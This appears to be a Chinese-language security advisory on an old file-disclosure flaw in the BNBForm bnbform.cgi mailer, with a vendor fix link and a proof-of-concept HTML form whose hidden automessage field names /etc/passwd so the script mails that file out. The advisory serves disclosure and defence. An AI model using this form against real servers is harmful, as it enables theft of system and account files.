BugCVE: CVE-1999-0937
BUGTRAQ: 2147
BNBForm是一个基于Web的通过表单提交发送邮件的CGI程序,由Big Nose Bird公司开发维护。BNBForm bnbform.cgi脚本实现上存在漏洞,远程攻击者可能利用此漏洞得到主机上的任意知道其名字的文件。
4.0版以下的bnbform.cgi对用户输入未做充分过滤,远程攻击者可能通过在“automessage”变量中指定想获取的系统上的文件名就可以让脚本把此文件寄给自己。攻击者由此可能访问到系统的敏感文件和信息。
目前厂商已经在新版的软件中修复这个安全问题,请到厂商的主页下载:
<a href=“http://bignosebird.com/carchive/bnbform.shtml” target=“_blank”>http://bignosebird.com/carchive/bnbform.shtml</a>
duke ([email protected])提供了如下测试方法:
<FORM METHOD= POST ACTION= http://www.victim.com/cgi-bin/bnbform.cgi >
FIELDS MARKED WITH * ARE REQUIRED!
Your Name:* <INPUT TYPE= TEXT NAME= name SIZE=35 MAXLENGTH=50>
<!-- SCRIPT CONFIGURATION SECTION -->
<INPUT TYPE= HIDDEN NAME= autorespond VALUE= yes >
<INPUT TYPE= HIDDEN NAME= automessage VALUE= /etc/passwd >
<INPUT TYPE= HIDDEN NAME= ok_url VALUE= http://127.0.0.1/thanks.html >
<INPUT TYPE= HIDDEN NAME= not_ok_url VALUE= http://127.0.0.1/oops.html >